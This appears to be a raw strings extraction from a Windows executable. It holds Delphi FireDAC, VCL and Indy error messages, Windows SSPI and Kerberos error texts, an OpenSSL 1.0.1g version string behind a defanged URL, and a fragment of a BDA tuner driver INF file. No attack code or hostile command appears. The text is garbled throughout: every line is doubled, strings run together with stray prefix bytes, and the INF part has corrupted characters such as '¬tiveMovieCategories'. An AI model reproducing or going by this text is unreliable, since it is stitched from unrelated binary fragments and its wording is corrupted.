Cannot parse object name - [%s])Syntax error in escape function [%s].
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
%shADPhysManager shutdown timeout.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported
Set TADConnection.DriverName or add DriverID to your connection definition
Set TADConnection.DriverName or add DriverID to your connection definition
Capability is not supported
Capability is not supported
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
Meta information mismatchvCannot load vendor library [%s].
Meta information mismatchvCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
%sXDriver [%s] cannot be released.
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %s
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %s
>Operation cannot mix aggregate value with record-varying value
>Operation cannot mix aggregate value with record-varying value
%s&Bookmark is not found for dataset [%s]
%s&Bookmark is not found for dataset [%s]
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s]
with dataset [%s] key fields [%s]
uColumn or function [%s] is not found.
uColumn or function [%s] is not found.
Invalid use of keyword
Invalid use of keyword
Invalid character found [%s]
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
')' expected but [%s] found"IN predicate list may not be empty
Expected [%s].Arithmetic in filter expressions not supported
Expected [%s].Arithmetic in filter expressions not supported
&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data type
%s,Value [%s] is out of range of [%s] data type
Column [%s] is read only
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set
%s is not a valid BCD value
%s is not a valid BCD value
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid SQL date/time values
Invalid SQL date/time values
FireDAC Login#Name [%s] is duplicated in the list
FireDAC Login#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
Value length - [%d], column fixed length - [%d]
0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset!Cannot modify a read-only dataset#Nested dataset must inherit from %s
0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset!Cannot modify a read-only dataset#Nested dataset must inherit from %s
Parameter '%s' not found
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
Unable to load bind parameters$Field '%s' is of an unsupported type
SQL not supported: %s
SQL not supported: %s
Execute not supported: %s1Operation not allowed on a unidirectional dataset
Execute not supported: %s1Operation not allowed on a unidirectional dataset
0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
Field '%s' must have a value
Field '%s' must have a value
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' cannot be modified
Field '%s' cannot be modified
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
No help keyword specified.
No help keyword specified.
Invalid FieldKind Field '%s' is of an unknown type
Invalid FieldKind Field '%s' is of an unknown type
Duplicate field name '%s'
Duplicate field name '%s'
Field '%s' not found#Cannot access field '%s' as type %s
Field '%s' not found#Cannot access field '%s' as type %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s
No help found for %s#No context-sensitive help installed$No topic-based help system installed
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Win32 error: %s (%u)%s%s
Win32 error: %s (%u)%s%s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
Unsupported clipboard format
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
Windows 8.1
Windows 8.1
Windows Server 2012 R2
Windows Server 2012 R2
(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
"%s" does not match RootKey
"%s" does not match RootKey
bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Invalid stream operation
Invalid stream operation
5The certificate is not valid for the requested usage.
5The certificate is not valid for the requested usage.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.
9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY
SEC_E_NO_KERB_KEY
'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.
;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
Failed to load %s.
Failed to load %s.
SSL status: "%s"
SSL status: "%s"
%s Alert
%s Alert
%s Read Alert
%s Read Alert
%s Write Alert
%s Write Alert
Error creating SSL context. Could not load root certificate.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Could not load certificate.#Could not load key, check password.
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code is not valid: %s
Reply Code already exists: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
File "%s" not found
Object type not supported.
Object type not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Command not supported.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation would block.
Operation now in progress.
Operation now in progress.
Operation already in progress.
Operation already in progress.
Socket operation on non-socket.
Socket operation on non-socket.
Protocol not supported.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Protocol family not supported.0Address family not supported by protocol family.
Invalid destination index (%d)
Invalid destination index (%d)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Resolving hostname %s.
Connecting to %s.
Connecting to %s.
Socket Error # %d
Socket Error # %d
Failed to get data for '%s'
Failed to get data for '%s'
Failed to set data for '%s'
Failed to set data for '%s'
Resource %s not found
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
%s expected$%s not in a class registration group
Property %s does not exist
Property %s does not exist
Thread creation error: %s
Thread creation error: %s
Thread Error: %s (%d)
Thread Error: %s (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid count (%d)
Invalid property type: %s
Invalid property type: %s
Invalid data type for '%s'
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
%s on line %d
Error reading %s%s%s: %s
Error reading %s%s%s: %s
Failed to create key %s
Failed to create key %s
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot create file "%s". %s
Cannot open file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property element: %s
Invalid property element: %s
Ancestor for '%s' not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Cannot assign a %s to a %s
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
Operation not supported
External exception %x
External exception %x
Interface not supported
Interface not supported
%s (%s, line %d)
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
'%s' is not a valid GUID value
I/O error %d
I/O error %d
The OpenSSL Project, hXXp://VVV.openssl.org/
The OpenSSL Project, hXXp://VVV.openssl.org/
1.0.1g
1.0.1g
ClassGUID={4d36e96c-e325-11ce-bfc1-08002be10318}
ClassGUID={4d36e96c-e325-11ce-bfc1-08002be10318}
LayoutFile=layout.inf
LayoutFile=layout.inf
DriverVer=07/01/2001,5.1.2535.0
DriverVer=07/01/2001,5.1.2535.0
Include=ks.inf
Include=ks.inf
Needs=KS.Registration
Needs=KS.Registration
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation
RegisterDlls=BDA.RegisterDlls
RegisterDlls=BDA.RegisterDlls
CopyFiles=BdaPlugIn.Files, BdaFilter.Files, BdaDriver.Files
CopyFiles=BdaPlugIn.Files, BdaFilter.Files, BdaDriver.Files
[DefaultInstall.NT]
[DefaultInstall.NT]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation.NT
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation.NT
BdaFilter.Files=11
BdaFilter.Files=11
BdaPlugIn.Files=11
BdaPlugIn.Files=11
AllDll.Files=11
AllDll.Files=11
BdaDriver.Files=10,system32\drivers
BdaDriver.Files=10,system32\drivers
AllDriver.Files=10,system32\drivers
AllDriver.Files=10,system32\drivers
[BDA.Registration]
[BDA.Registration]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration
[BDA.Installation]
[BDA.Installation]
[BDA.Installation.NT]
[BDA.Installation.NT]
[BDA.CategoryRegistration]
[BDA.CategoryRegistration]
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,FriendlyName,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,FriendlyName,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,CLSID,,%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,CLSID,,%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,FriendlyName,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,FriendlyName,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,CLSID,,%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,CLSID,,%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,Merit,1,00,00,60,00
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,Merit,1,00,00,60,00
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,FriendlyName,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,FriendlyName,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,CLSID,,"%GUID.BdaRenderer%"
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,CLSID,,"%GUID.BdaRenderer%"
[BDA.NodeRegistration]
